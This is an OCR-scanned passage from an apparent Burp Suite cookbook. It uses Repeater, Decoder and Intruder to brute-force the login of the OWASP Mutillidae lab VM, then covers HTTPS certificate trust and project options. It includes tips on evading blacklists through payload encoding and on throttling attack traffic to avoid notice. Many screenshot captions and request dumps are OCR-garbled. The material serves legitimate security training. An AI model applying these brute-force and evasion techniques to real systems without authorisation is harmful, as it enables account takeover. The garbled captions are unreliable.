Accept: text/htal, application/rhtal¢xal, application/ml;qe0.§,*/*;qe0.8 
Accept-Language: en-U5,en;q=0.5 

Accept-Encoding: gzip, deflate 

Beterer: http: //192.168.56. 101/ 

Connection: close 

Upgrade-Insecure-Requests: 1 


We will use Repeater quite a bit throughout this book. This chapter is just 
an introduction to the Repeater and to understand its purpose. 


Decoding with Decoder 


Burp Decoder is a tool that allows the tester to convert raw data into encoded 
data or to take encoded data and convert it back to plain text. Decoder supports 
several formats including URL encoding, HTML encoding, Base64 encoding, 
binary code, hashed data, and others. Decoder also includes a built-in hex editor. 


Getting ready 


As a web penetration test progresses, a tester might happen upon an encoded 
value. Burp eases the decoding process by allowing the tester to send the 
encoded value to Decoder and try the various decoding functions available. 


How to do it... 


Let's try to decode the value of the session token PHPSESSID found in the 
OWASP Mutillidae II application. When a user initially browses to the URL 
(http: //<Your_VM_Assigned_IP_Address>/mutillidae/), that user will be 
assigned a PHPSESSID cookie. The PHPSESSID value appears to be encrypted 
and then wrapped in base 64 encoding. Using Decoder, we can unwrap the value. 


1. Browse to the http: //<Your_VM_Assigned_IP_Address>/mutillidae/ 
application. 

2. Find the HTTP request you just generated from your browse within the 
Proxy | HTTP history tab (shown in the next screenshot). Highlight the 
PHPSESSID value, not the parameter name, right-click, and select Send to 
Decoder: 


Logging of out-of-scope Proxy traffic is disabled 


# Atos Method URL ‘Pans | Siah a ‘WME ype (Evenson Ti 


LTES. mutliae}avascnpojUveryfquery balo.. m E 
GET utiiaefavasorpQueryalrbog, 


MES 
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GET /wutillidae/index. php?page=Login.php HTTP/1.1 
Host: 192,168.56. 101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOWE4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537. 36 
Accept: text/htul, application/xhtultxul , application/xwl;q=0.9,*/*;q20.8 

Accept-Language: en-U5,en;q=0.$ 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56, 10 /mutillidae/ 

Cookie: showhints=]; PHPSESSID= 
Connection: close Send to Spider 
Upgrade-Insecure-Requests: 1 Do an active scan 


bpbh?,redwine; acgroupswithpersistnada 


Do a passive scan 
Send to intruder 
Send to Repeater Chea 
Send to Sequencer 

Send to Comparer 


= 


3. In the Decoder tab, in the Decode as... drop-down as follows, select Base 
64. Note the results are viewed in the Hex editor and are encrypted: 


Burp inuder Repeater Wdow Hep 


In this example, we cannot proceed any further. We can confirm the 
value was, indeed, wrapped in Base 64. However, the value that is 
unwrapped is encrypted. The purpose of this recipe is to show you how 
you can use Decoder to manipulate encoded values. 


Intruding with Intruder 


The Burp Intruder allows a tester to brute-force or fuzz specific portions of an 
HTTP message, using customized payloads. 


To properly set up customized attacks in Intruder, a tester will need to use the 
settings available in the four subtabs of Intruder: 


| , | | 


@ Attack Target 


Configure the details of the target for the attack. 


Host: | 127.0.0.1 
Port: 80 


() Use HTTPS 


Getting ready 


A tester may wish to fuzz or brute-force parameter values within a message. 
Burp Intruder eases this process by providing various intruder attack styles, 
payloads, and options. 


How to do it... 


1. Browse to the login screen of Mutillidae and attempt to log into the 
application. For example, type a username of admin and a password of 
adminpass. 

2. Find the login attempt in the Proxy | HTTP history tab. Your request 
number (that is, the # sign on the left-hand side) will be different from the 
one shown next. Select the message that captured your attempt to log in. 


3. As the login attempt message is highlighted in the HTTP history table, 
right-click the Request tab, and select Send to Intruder: 
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Logging of out-of-scope Proxy traffic is disabled 


Fiter. Hiding CSS, image and general binary content 


Host Method | URL Params | Edited | Status | Length | MIME type | Extension 

4 http:/192.168.96.101 GET  iguery.min js 200 57733 script js 
10 —_https/192.168.56.101 GET  /mutilidae 301 683 HTML 

411 https/192.168.56.101 GET  /mutilidae/ 200 46164 HTML 

14 https/192.168.56.101 GET  /mutilidae/javascript'bookmark-site.js 200 1541 soript js 
15 https/192.168,56.101 GET  /mutilidae/javascript'ddsmoothmenu/qu... 200 57733 script js 
16 —_http://192.168.56.101 GET (mutilidae/javascriptiddsmoothmenu/dd... 200 9116 script is 
18  httpW192.168.56.101 GET (mutilidae/javascriptiQuery/iquery js 200 268220 script j 
19 https/192.168.56.101 GET  /mutilidae/javascriptjQuery/jquery.ballo... 200 11816 script j 
20  http.//192.168.56.101 GET —_/mutilidae/javascriptiQuery/colorbox/j... 200 10323 script js 
41 http://192.168.56.101 GET  /mutilidae/index.php?page=login.ph v 200 50769 HTML ph 


mo 
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POST /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168.56.101 i 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOWE4) AppleWebKit/537.36 (K Send to Spider 02.9 Safari/537.36 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.9 Doan active scan 

Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.$6.101/mutillidae/index. php?page=Login. php SENG l0 intrugér 
Content-Type: application/x-www-form-urlencoded Send to Repeater 
Content-Length: 63 

Cookie: showhints=1; PHPSESSID=juttplah3jsrpqéh03did4804d2; acopendivids Sna h Sopo 
Connection: close Send to Comparer 


Upgrade-Insecure-Requests: 1 Send to Decoder 


Do a passive scan 


acgroupswithpersist= 


Show response in browser 
Request in browser 


Engagement tools b 


usernamezaduintpassword=adminpassélogin-php-submit-button=Login 


(2) B B L) Type a search term 


Target 


The Intruder Target tab defines your targeted web application. These settings are 
pre-populated for you by Burp: 


— 


(2j Attack Target 


Configure the details of the target for the attack. 
Host: | 192.168.56.101 
Port: 80 


|} Use HTTPS 


Positions 


The Positions tab identifies where the payload markers are to be defined within 
the Payload | Positions section. For our purposes, click the Clear § (that is, 
payload markers) from the right-hand side menu. Manually select the password 
field by highlighting it with your cursor. Now click the Add § button on the 
right-hand side menu. You should have the payload markers wrapping around 
the password field as follows: 


Corfu fe povtons where paybad wl be reid nio tha base request. The atack ype cerns te way which payloads are assigned 1o payload postions- see a ful ea, 
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POST /autillidae/indes,php?payeeLogin, php HITP/1.1 

Host: 182.168, $8.10) 

Vsar=Agont: HoeklLa/S.0 (Windows NT 10,0; WOVE) AppLeVebst/427.36 (KHTML, Like Gacko) Chrome/E2,0, 2202.9 Satari/$7,6 
Accept: tert/htal, application/ahtaltaal, application/ealged,$,*/*;¢e0,0 

Arcept=Language: ane l3,en;qu0.4 

Accept =Incoding: gaip, dilate 

alarar: beep: //192, 100. $6.10) aut LLL dae/ index, php pager login. php 

ContentType: application/x-vev=forauslencoded 

Content =Langth: €} 


Cookie: shovhintsel) PRDSLESTDsjuceplahijsrpqehOSdidGodd; acopendividswswingset, jotto, phpbb? reduine; acgroupsvithpersistenada 
Connection; close 
Upyrade=Insecure=Pequests: 1 
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Payloads 


After the Positions tab is the Payloads tab. The Payloads tab identifies wordlist 
values or numbers you wish to be inserted into the positions you identified on 
the previous tab. There are several sections within the Payloads tab, including 
Payload Sets, Payload Options, Payload Processing, and Payload Encoding. 


Payload Sets 


Payload Sets allows for the setting of the number of payloads as well as the 
type. For our purposes, we will use the default settings for Sniper, allowing us to 
use one payload with a Payload type of Simple list: 


@ Payload Sets 


You can define one or more payload sets. The number of payload se 
can be customized in different ways. 


Payload set: | 1 v Payload count: 0 


Payload type: | Simple list ~ Request count: 0 


Payload Options 


In the Payload Options section, a tester can configure a custom payload or load 
a preconfigured one from a file. 


For our purposes, we will add one value to our payload. In the text box, type 
admin, and then click the Add button to create our custom payload: 


(2) Payload Options [Simple list 
This payload type lets you configure a simple list of strings that are used as payloads. 
Paste | 


Load ... 


Remove b 


Clear 


| Add from list ... i7) 


Payload Processing 


Payload Processing is useful when configuring special rules to be used while 
Intruder substitutes payloads into payload marker positions. For this recipe, we 
do not need any special payload-processing rules: 


(2) [Payload Processing 


You can define rules to perform various processing tasks on each payload before it is used. 


Enabled | Rule | 


|] 


Edit 


Up 


hd 


Down 


Payload Encoding 


Payload Encoding is applied to the payload value prior to sending the request to 
the web server. Many web servers may block offensive payloads (for example, 
<script> tags), so the encoding feature is a means to circumvent any blacklist 
blocking. 


For the purpose of this recipe, leave the default box checked: 


y Payload Encoding 


This setting can be used to URL-encode selected characters wihin the fl payload, for safe transmission wihin HTTP requests, 


W URl-encode these characters, Jeor 


Options 


Finally, the Intruder | Options tab provides attack table customizations, 
particularly related to responses captured such as specific error messages. There 
are several sections within the Intruder | Options tab, including Request 
Headers, Request Engine, Attack Results, Grep-Match, Grep-Extract, Grep 
- Payloads, and Redirections: 


Target | Proxy | Spider | Scanner 


Target | Positions | Payloads 


Request Headers 


Request Headers offers configurations specific to header parameters while 
Intruder is running attacks. For the purpose of this recipe, leave the default boxes 
checked: 


|] Request Headers 
2 


(o) These settings control whether Intruder updates the configured request headers during attacks. 


Œ) Update Content-Length header 
() Set Connection: close 


Request Engine 


Request Engine should be modified if a tester wishes to create less noise on the 
network while running Intruder. For example, a tester can throttle attack requests 
using variable timings so they seem more random to network devices. This is 
also the location for lowering the number of threads Intruder will run against the 
target application. 


For purpose of this recipe, leave the default setting as-is: 


(2) Request Engine 


OG These settings control the engine used for making HTTP requests when performing attacks. 


Number of threads: 5 


Number of retries on network failure: 3 
Pause before retry (milliseconds): 2000 
Throttle (milliseconds): @ Fixed 0 
\ Variable: start . step 30000 
Start time: @ Immediately 
O In 10 minutes 


(I Paused 


Attack Results 


After starting the attack, Intruder creates an attack table. The Attack Results 
section offers some settings around what is captured within that table. 


For the purpose of this recipe, leave the default settings as-is: 


2] Attack Results 


(o) These settings control what information is captured in attack results. 


W@W) Store requests 

(4) Store responses 

Œ) Make unmodified baseline request 

J) Use denial-of-service mode (no results) 
_) Store full payloads 


Grep - Match 


Grep - Match is a highly useful feature that, when enabled, creates additional 
columns in the attack table results to quickly identify errors, exceptions, or even 
a custom string within the response. 


For the purpose of this recipe, leave the default settings as-is: 


f} Grep - Match 


(o) These settings can be used to flag result items containing specified expressions. 


|) Flag result items with responses matching these expressions: 


| Paste error à 
| exception 
| Load... illegal 
| invalid 
| Remove fail » 
stack 
| Clear access 
directory 
file M 
| Add Enter a new item 


Match type: © Simple string 
© Regex 


|} Case sensitive match 
@) Exclude HTTP headers 


Grep - Extract 


Grep - Extract, when enabled, is another option for adding a column in the 
attack table whose label is specific to a string found in the response. This option 
differs from Grep - Match, since Grep - Extract values are taken from an actual 
HTTP response, as opposed to an arbitrary string. 


For the purpose of this recipe, leave the default settings as-is: 


oE 


© These settings can be used to extract useful information from responses into the attack results table. 


(J Extract the following items from responses: 


Remove 
Duplicate b 
up | 
Down 
Clear | 


Maximum capture length: 100 


Grep - Payloads 


Grep - Payloads provides a tester the ability to add columns in the attack table 
in which responses contain reflections of payloads. 


For the purpose of this recipe, leave the default settings as-is: 


(2) Grep - Payloads 


(a) These settings can be used to flag result items containing reflections of the submitted payload. 


(C) Search responses for payload strings 

ÙU Case sensitive match 

J Exclude HTTP headers 

Œ) Match against pre-URL-encoded payloads 


Redirections 


Redirections instructs Intruder to never, conditionally, or always follow 
redirections. This feature is very useful, particularly when brute-forcing logins, 
since a 302 redirect is generally an indication of entry. 


For the purpose of this recipe, leave the default settings as-is: 


p [eren 


© These settings control how Burp handles redirections when performing attacks. 


Follow redirections: @ Never 
\ On-site only 
O In-scope only 
Always 


|_| Process cookies in redirections 


Start attack button 


Finally, we are ready to start Intruder. On either the Payloads or the Options 
tabs, click the Start attack button to begin: 


Target | Positions | Payloads | Options 
|?| Payload Sets | Start attack 


When the attack has started, an attack results table will appear. This allows the 
tester to review all requests using the payloads within the payload marker 
positions. It also allows us to review of all responses and columns showing 
Status, Error, Timeout, Length, and Comment. 


For the purpose of this recipe, we note that the payload of admin in the password 
parameter produced a status code of 302, which is a redirect. This means we 
logged into the Mutillidae application successfully: 


POST /mutillidae/index.php?page=login. php HTTP/L.1 

Host: 192. 168.6. 101 

User-Agent: Mozilla/$.0 (Windows NT 10.0; WOWE4) AppleWebKit/$37.36 (KHTML, like Gecko) Chrome/62.0, 3202.9 
Safari/$37. 36 

Accept: text/html, application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US, en;q20.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56, 101/mutillidae/index. php?page*login, php 

Content-Type: application/x-winw-form-urlencoded 

Content-Length: 59 

Cookie: showhints=1; PHPSESSID=juttplah3jsxpqchO3didGodd2; acopendivids=svingset, Jotto, phpbb2, reduine; 
acgroupswithpersist=nada 

Connection: close 

Upgrade-Insecure-Requests: 1 


username=adwingpassword=adwinglogin-php-submit-button=Login 


2) B (e [>] Type a search term ( matches 
ht 


Looking at Response | Render within the attack table allows us to see how the 
web application responded to our payload. As you can see, we are successfully 
logged in as an admin: 


E 4 _ g 


Attack Save Columns 


| Resuts l Target | Positions | Payloads | Options 


Filter: Showing all tems 2) 
| Request à| Payload | Status Error Timeout | Length | Comment 
| 0 200 O e] 50838 


raw [mre | nex Tu J eaer 


* OWASP Mutillidae II: Web Pwn in Mass Production 


Hints: Enabled (1 - Script Kiddie) 


1: 2.6.24 Security Level: 0 (Hosed) 


< 


Finished 


Configuring, Spidering, Scanning, 
and Reporting with Burp 


In this chapter, we will cover the following recipes: 


Establishing trust over HTTPS 
Setting project options 

Setting user options 

Spidering with Spider 
Scanning with Scanner 
Reporting issues 


Introduction 


This chapter helps testers to calibrate Burp settings so they're less abusive 
toward the target application. Tweaks within Spider and Scanner options can 
assist with this issue. Likewise, penetration testers can find themselves in 
interesting network situations when trying to reach a target. Thus, several tips 
are included for testing sites running over HTTPS, or sites only accessible 
through a SOCKS Proxy or a port forward. Such settings are available within 
project and user options. Finally, Burp provides the functionality to generate 
reports for issues. 


Software tool requirements 


In order to complete the recipes in this chapter, you will need the following: 


OWASP Broken Web Applications (VM) 

OWASP Mutillidae link 

Burp Proxy Community or Professional (https://portswigger.net/burp/) 
Firefox browser configured to allow Burp to proxy traffic 


(https://www.mozilla.org/en-US/firefox/new/) 


e The proxy configuration steps are covered in chapter 


Establishing trust over HTTPS 


Since most websites implement Hypertext Transport Protocol Secure 
(HTTPS), it is beneficial to know how to enable Burp to communicate with such 
sites. HTTPS is an encrypted tunnel running over Hypertext Transport 
Protocol (HTTP). 


The purpose of HTTPS is to encrypt traffic between the client browser and the 
web application to prevent eavesdropping. However, as testers, we wish to allow 
Burp to eavesdrop, since that is the point of using an intercepting proxy. Burp 
provides a root, Certificate Authority (CA) signed certificate. This certificate 
can be used to establish trust between Burp and the target web application. 


By default, Burp's Proxy can generate a per-target CA certificate when 
establishing an encrypted handshake with a target running over HTTPS. That 
takes care of the Burp-to-web-application portion of the tunnel. We also need to 
address the Browser-to-Burp portion. 


In order to create a complete HTTPS tunnel connection between the client 
browser, Burp, and the target application, the client will need to trust the 
PortSwigger certificate as a trusted authority within the browser. 


Getting ready 


In situations requiring penetration testing with a website running over HTTPS, a 
tester must import the PortSwigger CA certificate as a trusted authority within 


their browser. 


How to do it... 


Ensure Burp is started and running and then execute the following steps: 


1. Open the Firefox browser to the http://burp URL. You must type the URL 
exactly as shown to reach this page. You should see the following screen in 
your browser. Note the link on the right-hand side labeled CA Certificate. 
Click the link to download the PortSwigger CA certificate: 


€¢4/9 C4 © http//bup + Y vy NO = 


Burp Suite Professional CA Certificate 


Welcome to Burp Suite Professional. 


2. You will be presented with a dialog box prompting you to download the 
PortSwigger CA certificate. The file is labeled cacert .der. Download the 
file to a location on your hard drive. 

3. In Firefox, open the Firefox menu. Click on Options. 


4. Click Privacy & Security on the left-hand side, scroll down to 
Certificates section. Click the View Certificates... button: 


Ç C a Ë Firefox aboutpreferences#privacy v Mo 


J Find in Options 


Firefox for everyone. We always ask permission before receiving personal information. 


Privacy Notice 


V Allow Firefox to send technical and interaction data to Mozilla Learn more 


r; General 
A Home 
Q Search 
Allow Firefox to send backlogged crash reports on your behalf Learn more 
m Privacy & Security 


£5 Firefox Account Security 


V Allow Firefox to install and run studies View Firefox Studies 


Deceptive Content and Dangerous Software Protection 


V Block dangerous and deceptive content Learn more 
V Block dangerous downloads 


v Warn you about unwanted and uncommon software 


Certificates 


When a server requests your personal certificate 


Select one automatically 


@ Ask you every time 


r Query OCSP responder servers to confirm the current validity of 


certificates , 
@ Firefox Support Security Devices... 


5. Select the Authorities tab. Click Import, select the Burp CA certificate file 
that you previously saved, and click Open: 


Certificate Manager X 


Your Certificates People Servers Authorities 


You have certificates on file that identify these certificate authorities 


Certificate Name Security Device B 
vAC Camerfirma S.A. à 
Chambers of Commerce Root - 2008 Builtin Object Token 
Global Chambersign Root - 2008 Builtin Object Token 
vAC Camerfirma SA CIF A82743287 
Camerfirma Chambers of Commerce Root Builtin Object Token 
Camerfirma Global Chambersign Root Builtin Object Token 
vACCV 
ACCVRAIZ1 Builtin Object Token 
vActalis S.p.4./03358520967 y% 


View... Edit Trust... Export... Delete or Distrust... 


OK 


6. In the dialog box that pops up, check the Trust this CA to identify 
websites box, and click OK. Click OK on the Certificate Manager dialog as 
well: 


You have been asked to trust a new Certificate Authority (CA). 


Do you want to trust “PortSwigger CA” for the following purposes? 


Trust this CA to identify websites. 


[_] Trust this CA to identify email users. 


Before trusting this CA for any purpose, you should examine its certificate and its policy and 
procedures (if available). 


View Examine CA certificate 


Close all dialog boxes and restart Firefox. If installation was successful, you 
should now be able to visit any HTTPS URL in your browser while proxying the 
traffic through Burp without any security warnings. 


Setting Project options 


Project options allow a tester to save or set configurations specific to a project or 
scoped target. There are multiple subtabs available under the Project options 
tab, which include Connections, HTTP, SSL, Sessions, and Misc. Many of these 
options are required for penetration testers when assessing specific targets, 
which is why they are covered here. 


How to do it... 


In this book, we will not be using many of these features but it is still important 
to know of their existence and understand their purpose: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options 


Connections | HTTP | SSL | Sessions | Misc 


The Connections tab 


Under the Connections tab, a tester has the following options: 


e Platform Authentication: This provides an override button in the event the 
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(e) 


tester wants the Project options related to the type of authentication used 
against the target application to supersede any authentication settings within 
the user options. 


After clicking the checkbox to override the user's options, the tester is 
presented with a table enabling authentication options (for example, 
Basic, NTLMv2, NTLMv1, and Digest) specific to the target application. 
The destination host is commonly set to wildcard * should a tester find 
the need to ever use this option: 


Platform Authentication 


These settings are configured within user options but can be overridden here for this specific project. 

Œ) Override user options 

These settings let you configure Burp to automatically carry out platform authentication to destination web servers. 
Œ Do platform authentication 


| Add | | Destination host à| Type | Username | Domain | Domain hostname 


| Edit | 


| Remove | » 


O] Prompt for credentials on platform authentication failure 


Upstream proxy servers: It provides an override button in the event the 
tester wants the Project options related to upstream proxy servers used 
against the target application to supersede any proxy settings contained 
within the user options. 


After clicking the checkbox to override the user's options, the tester is 
presented with a table enabling upstream proxy options specific to this 


project. Clicking the Add button displays a pop-up box called Add 
upstream proxy rule. This rule is specific to the target application's 
environment. This feature is very helpful if the target application's 
environment is fronted with a web proxy requiring a different set of 
credentials than the application login: 


E Aca upstream proxy rule 


A 


Enter the details of the upstream proxy rule. You can use wildcards to specify 
destination hosts (* matches zero or more characters, ? matches any 
character except a dot). Leave the proxy host blank to connect directly for the 
specified destination host. 


Destination host: Destination host, may include wildcards 

Proxy host: Proxy host, leave blank to connect directly 

Proxy port: 

Authentication type: | None 7 
Username: 

Password: 


Domain: 


Domain hostname: 


| OK | | Cancel | 


e SOCKS Proxy: It provides an override button in the event the tester wishes 


for Project options related to the SOCKS Proxy configuration used against 
the target application to supersede any SOCKS Proxy settings within the 
user options. 


After clicking the checkbox to override user options, the tester is 
presented with a form to configure a SOCKS Proxy specific to this 
project. In some circumstances, web applications must be accessed over 
an additional protocol that uses socket connections and authentication, 
commonly referred to as SOCKS: 


1) SOS ry 


i These Stns are ori win user po Dut can be vee here rfng specie rec 
1 Ovni 


These stings you configure Burp to usea SOCKS poy, Th seting apple a TC eve! andal otond reqs wil be sent va is prany, yOu Tae 
cnfgued res or upstream TT pray ave, Pen euesi o ustean pros wibe set ale SOCKS proxy cfu fee 


Je 


e Timeouts: It allows for timeout settings for different network scenarios, 
such as failing to resolve a domain name: 


(2) Timeouts 


(e) These settings specify the timeouts to be used for various network tasks. Values are in seconds. Set an option to zero or leave it blank to never timeout that task. 


Normal: 120 
Open-ended responses: 10 
Domain name resolution: 300 


Failed domain name resolution: 60 


e Hostname Resolution: It allows entries similar to a host file on a local 
machine to override the Domain Name System (DNS) resolution: 


(2) Hostname Resolution 


g Add entries here to override your computer's DNS resolution. 


Enabled | Hostname å | IP address 


e Out-of-Scope Requests: It provides rules to Burp regarding Out-of-Scope 
Requests. Usually, the default setting of Use suite scope [defined in Target 
tab] is most commonly used: 


Out-of-Scope Requests 


This feature can be used to prevent Burp from issuing any out-of-scope requests, including those made via the proxy. 


%) S) 


Drop all out-of-scope requests 


0 
® Use suite scope [defined in Target tab] 
Ə 


Use custom scope 


The HTTP tab 


Under the HTTP tab, a tester has the following options: 


e Redirections: It provides rules for Burp to follow when redirections are 
configured. Most commonly, the default settings are used here: 


(2) Redirections 


(23) These settings control the types of redirections that Burp will understand in situations where it is configured to follow redirections. 
When following redirections, understand the following types: 


@) 3xx status code with Location header 
Œ) Refresh header 

Œ) Meta refresh tag 

LJ JavaScript-driven 

LJ Any status code with Location header 


Streaming Responses: It provides configurations related to responses that 
stream indefinitely. Mostly, the default settings are used here: 


(2) Streaming Responses 


(3) These settings are used to specify URLs returning responses that stream indefinitely. The Proxy will pass these responses straight through to the client. Repeater will update the 


response panel as the response is received. Other tools will ignore streaming responses. In order to view the contents of streaming responses within Burp, you need to check 
the “store streaming responses” option. 


O Use advanced scope control 


Add | Enabled | Prefix 


Edit 
Remove 


Paste URL 


Load ... 


@) Store streaming responses (may result in large temp files) 


E Strip chunked encoding metadata in streaming responses 


e Status 100 Responses: It provides a setting for Burp to handle HTTP status 
code 100 responses. Most commonly, the default settings are used here: 


~J 


[?) Status 100 Responses 


5 These settings control the way Burp handles HTTP responses with status 100. 


(7) Understand 100 Continue responses 
[C Remove 100 Continue headers 


The SSL tab 


Under the SSL tab, a tester has the following options: 


e SSL Negotiations: When Burp communicates with a target application over 


SSL, this option provides the ability to use preconfigured SSL ciphers or to 
specify different ones: 


(2) SSL Negotiation 


| t) These settings control the SSL protocols and ciphers that Burp will use when performing SSL negotiation with upstream servers. If you are experiencing problems with SSL 


— negotiation, you can use these settings to request use of specific protocols or ciphers. Use these options with caution as misconfiguration may break all your outgoing SSL 
connections. 


@ Use the default protocols and ciphers of your Java installation 


O Use custom protocols and ciphers 


SSL Negotiation Workarounds 

@) Automatically select compatible SSL parameters on negotiation failure 
O Allow unsafe renegotiation (required for some client certificates) 

LJ Disable SSL session resume 


If a tester wishes to customize the ciphers, they will click the Use custom 
protocols and ciphers radio button. A table appears allowing selection of 


protocols and ciphers that Burp can use in the communication with the 
target application: 


(2) SSL Negotiation 


(2 


(2) 
© 


These settings control the SSL protocols and ciphers that Burp will use when performing SSL negotiation with upstream servers. If you are experiencing problems with SSL 
negotiation, you can use these settings to request use of specific protocols or ciphers. Use these options with caution as misconfiguration may break all your outgoing SSL 


connections. 


O Use the default protocols and ciphers of your Java installation 


@ Use custom protocols and ciphers 


SSL Protocols 


| Select all J Enabled | Protocol 
IEn O SSLv2Hello 
Select none @ SSLv3 
[€] TLSv1 
cs) TLSv1.1 
g TLSv1.2 
SSL Ciphers 
Select all Enabled | Cipher 
© TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 
Select none (€) TLS_ECDHE_RSA_WITH_AES 256 CBC_SHA384 
w TLS_RSA_WITH_AES_256_CBC_SHA256 
g TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 
(© TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 
w TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 
© TLS_DHE_DSS_WITH_AES_256_CBC_SHA256 
i TLS_FECDHE FANSA WITH AFS 256 CRC SHA 


SSL Negotiation Workarounds 


@ Automatically select compatible SSL parameters on negotiation failure 


O Allow unsafe renegotiation (required for some client certificates) 


e Client SSL Certificates: It provides an override button in the event the 
tester must use a client-side certificate against the target application. This 
option will supersede any client-side certificate configured within the user 


options. 


After clicking the checkbox to override user options, the tester is 
presented with a table to configure a client-side certificate specific to this 
project. You must have the private key to your client-side certificate in 
order to successfully import it into Burp: 


Client SSL Certificates 


These settings are configured within user options but can be overridden here for this specific project. 


@) Override user options 


These settings let you configure the client SSL certificates that Burp will use when a destination host requests one. Burp will use the first certificate in the list whose host 
configuration matches the name of the host being contacted. You can double-click on an item to view the full details of the certificate. 


i 


p 
; 


i 


Down 


i 


Enabled 


| Host Type | Alias | Subject 


e Server SSL Certificates: It provides a listing of server-side certificates. A 
tester can double-click any of these line items to view the details of each 


v 


(2) 
© 


certificate: 


Server SSL Certificates 


This panel shows a list of the unique SSL certificates received from web servers. Double-click an item to show the full details of the certificate. 


Host 


Name 


| Issuer 


safebrowsing.googleapis.com 
www.google.com 
getpocket.cdn.mozilla.net 
safebrowsing.googleapis.com 
tiles. services.mozilla.com 
incoming.telemetry.mozilla.org 
shavar.services.mozilla.com 


* googleapis.com 
www.google.com 
*.cdn.mozilla.net 

+ googleapis.com 

+ services.mozilla.com 

* telemetry.mozilla.org 
shavar.services.mozilla.com 


Google Internet Authority G3 
Google Internet Authority G3 
DigiCert SHA2 Secure Server CA 
Google Internet Authority G3 
DigiCert SHA2 Secure Server CA 
DigiCert SHA2 Secure Server CA 
DigiCert SHA? Secure Server CA 


The Sessions tab 


This book will cover recipes on all functionality contained within the Sessions 
tab in Chapter 10, Working with Burp Macros and Extensions. A review of each 
of these sections within the Sessions tab is provided here for completeness. 


Under the Sessions tab, a tester has the following options: 


e Session Handling Rules: It provides the ability to configure customized 
session-handling rules while assessing a web application: 


(2) Session Handling Rules 
(e) You can define session handling rules to make Burp perform specific actions when making HTTP requests. Each rule has a defined scope (for particular tools, URLs or 


parameters), and can perform actions such as adding session cookies, logging in to the application, or checking session validity. Before each request is issued, Burp applies in 
sequence each of the rules that are in-scope for the request. 


Add Enabled | Description | Tools | 


| [EJ] Use cookies from Burp's cookie jar Spider and Scanner 
Edit 


Remove 
Duplicate 


Up 


Down 


To monitor or troubleshoot the behavior of your session handling rules, you can use the sessions tracer to view in detail the results of processing each rule. 


Open sessions tracer 


e Cookie Jar: It provides a listing of cookies, domains, paths, and 
name/value pairs captured by Burp Proxy (by default): 


Cookie Jar 


Burp maintains a cookie jar that stores all of the cookies issued by visited web sites. Session handling rules can use and update these cookies to maintain valid sessions with 
applications that are being tested. You can use the settings below to control how Burp automatically updates the cookie jar based on traffic from particular tools. 


© & 


Monitor the following tools’ traffic to update the cookie jar: 


@ Proxy O Scanner (O Repeater Œ) Spider 


O intruder =) Sequencer Q Extender 


| Open cookie jar 


e Macros: It provides the ability of a tester to script tasks previously 
performed in order to automate activities while interacting with the target 
application: 


(2) Macros 


A macro is a sequence of one or more requests. You can use macros within session handling rules to perform tasks such as logging in to the application, obtaining anti-CSRF 
tokens, etc. 


at tla 


Down 


The Misc tab 


Under the Misc tab, a tester has the following options: 


e Scheduled Tasks: It provides the ability to schedule an activity at specific 
times: 


?| Scheduled Tasks 


o These settings let you specify tasks that Burp will perform automatically at defined times or intervals. 


Add | | Time | Repeat “Task 


When the Add button is clicked, a pop-up reveals the types of activities 
available for scheduling: 


>| Select the type of task you want to run. 


@ Scan froma URL 

O Pause active scanning 
O Resume active scanning 
O Spider from a URL 

O Pause spidering 

O Resume spidering 


O Save state 


Cancel | | Next | 


e Burp Collaborator Server: It provides the ability to use a service external 
to the target application for the purposes of discovering vulnerabilities in 
the target application. This book will cover recipes related to Burp 
Collaborator in Chapter 11, Implementing Advanced Topic Attacks. A 
review of this section is provided here for completeness: 


(2) Burp Collaborator Server 


Burp Collaborator is an external service that Burp can use to help discover many kinds of vulnerabilities. You can use the default Collaborator server provided by PortSwigger, 
or deploy your own instance. ‘ou should read the full documentation for this feature and decide which option is most appropriate for you. 

© Use the default Collaborator server 

© Don't use Burp Collaborator 

© Use a private Collaborator server: 


Server location: 


Polling location (optional): 


Run health chec 


e Logging: It provides the ability to log all requests and responses or filter 
the logging based on a particular tool. If selected, the user is prompted for a 
file name and location to save the log file on the local machine: 


[2] Logging 
(e) These settings control logging of HTTF reguests and responses. 


All tools: _| Requests |) Responses 
Proxy: [C] Requests (|) Responses 
Spider: [C] Requests (J) Responses 
Scanner: _| Requests (J Responses 
Intruder: |) Requests [] Responses 
Repeater: _| Requests (J Responses 


Sequencer: |) Requests (J) Responses 
Extender: C] Requests (|) Responses 


Setting user options 


User options allow a tester to save or set configurations specific to how they 
want Burp to be configured upon startup. There are multiple sub-tabs available 
under the user options tab, which include Connections, SSL, Display, and Misc. 
For recipes in this book, we will not be using any user options. However, the 
information is reviewed here for completeness. 


How to do it... 


Using Burp user options, let's configure your Burp UI in a manner best suited to 
your penetration-testing needs. Each of the items under the Connections tab is 
already covered in the Project options section of this chapter, hence, we will 
directly start with the SSL tab. 


The SSL tab 


Under the SSL tab, a tester has the following options: 
e Java SSL Options: It provides the ability the configure Java security 


libraries used by Burp for SSL connections. The default values are most 
commonly used: 


u Java SSL Options 


| 4 These settings can be used to enable certain SSL features that might be needed to successfully connect fo some Servers. 


W Enable algorithms blocked by Java security policy (requires restart 
| Disable Java SN extension (requires restart) 


e Client SSL Certificate: This section is already covered in the Project 
options section of this chapter. 


The Display tab 


Under the Display tab, a tester has the following options: 


e User Interface: It provides the ability to modify the default font and size of 
the Burp UI itself: 


User Interface 


These settings let you control the appearance of Burp's user interface. 


Font size: | 11 |€ | 
Look and feel: | Nimbus i 


e HTTP Message Display: It provides the ability to modify the default font 
and size used for all HTTP messages shown within the message editor: 


ES 


~d 


@ HTTP Message Display 


